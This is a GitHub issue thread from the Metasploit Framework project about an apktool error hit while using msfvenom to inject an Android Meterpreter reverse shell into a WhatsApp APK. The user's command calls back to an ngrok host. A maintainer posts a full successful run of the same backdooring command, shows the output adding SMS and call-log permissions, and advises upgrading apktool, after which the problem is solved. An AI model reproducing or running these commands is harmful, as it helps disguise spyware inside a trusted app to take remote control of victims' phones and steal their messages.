### ISSUE TITLE
Apktool unable to rebuild the apk

### ISSUE THREAD

**Issue by czonta96** [rapid7/metasploit-framework#16321]
msfvenom -x whatsapp.apk -p android/meterpreter/reverse_https LHOST=3.tcp.eu.ngrok.io LPORT=22860 -o app.apk
Using APK template: whatsapp.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.whatsapp.gxryj
[*] Loading /tmp/d20220309-4410-htmmc9/original/smali/com/whatsapp/AppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220309-4410-htmmc9/output.apk
[-] I: Using Apktool 2.5.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;
        at org.jf.dexlib2.writer.DexWriter.writeAnnotationDirectories(DexWriter.java:919)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:344)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:420)
        at brut.androlib.Androlib.buildSources(Androlib.java:351)
        at brut.androlib.Androlib.build(Androlib.java:303)
        at brut.androlib.Androlib.build(Androlib.java:270)
        at brut.apktool.Main.cmdBuild(Main.java:259)
        at brut.apktool.Main.main(Main.java:85)
Error: Unable to rebuild apk with apktool

App-name: whatsapp-build 2018

**Comment by bcoles** [comment]
Where did you download `whatsapp.apk` from? `whatsapp.net` ?

It works for me using apktool version 2.6.0. Perhaps try upgrading to 2.60 or 2.6.1.

```
# ./msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: WhatsApp.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.whatsapp.niocw
[*] Loading /tmp/d20220309-1428-16jm0aj/original/smali/com/whatsapp/AppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220309-1428-16jm0aj/output.apk
[*] Aligning /tmp/d20220309-1428-16jm0aj/output.apk
[*] Signing /tmp/d20220309-1428-16jm0aj/aligned.apk with apksigner
Payload size: 50462564 bytes
Saved as: asdf.apk
```

```
# file asdf.apk 
asdf.apk: Zip archive data, at least v2.0 to extract, compression method=deflate
```

```
# keytool -printcert -jarfile asdf.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Signer #1:

Signature:

Owner: CN=Brian Acton, OU=Engineering, O=WhatsApp Inc., L=Santa Clara, ST=California, C=US
Issuer: CN=Brian Acton, OU=Engineering, O=WhatsApp Inc., L=Santa Clara, ST=California, C=US
Serial number: 43bd269c
Valid from: Fri Jun 25 19:07:16 EDT 2010 until: Mon Feb 15 18:07:16 EST 2044
Certificate fingerprints:
	 SHA1: CD:47:81:C6:F9:80:10:D8:A4:52:6D:33:90:8F:39:95:3D:67:0D:C9
	 SHA256: F1:48:CD:FB:9D:26:A8:F7:1C:47:55:B8:CA:39:1B:4E:27:82:DF:C4:BC:BD:DD:4A:DC:41:3B:4C:D3:75:30:EA
Signature algorithm name: SHA256withRSA
Subject Public Key Algorithm: 2048-bit RSA key
Version: 3

Extensions: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 9E 79 49 2B 1D D1 6E A9   26 20 FD 37 3B 8A 7D 84  .yI+..n.& .7;...
0010: 4C 88 4E 09                                        L.N.
]
]

```

**Comment by bcoles** [comment]
This looks like an issue with apktool which was patched in [v2.6.0](https://github.com/iBotPeaches/Apktool/releases/tag/v2.6.0).

* https://github.com/iBotPeaches/Apktool/issues/2541
* https://github.com/iBotPeaches/Apktool/issues/2114

Update to apktool 2.6.0 or 2.6.1.

**Comment by czonta96** [comment]
Problem solved.
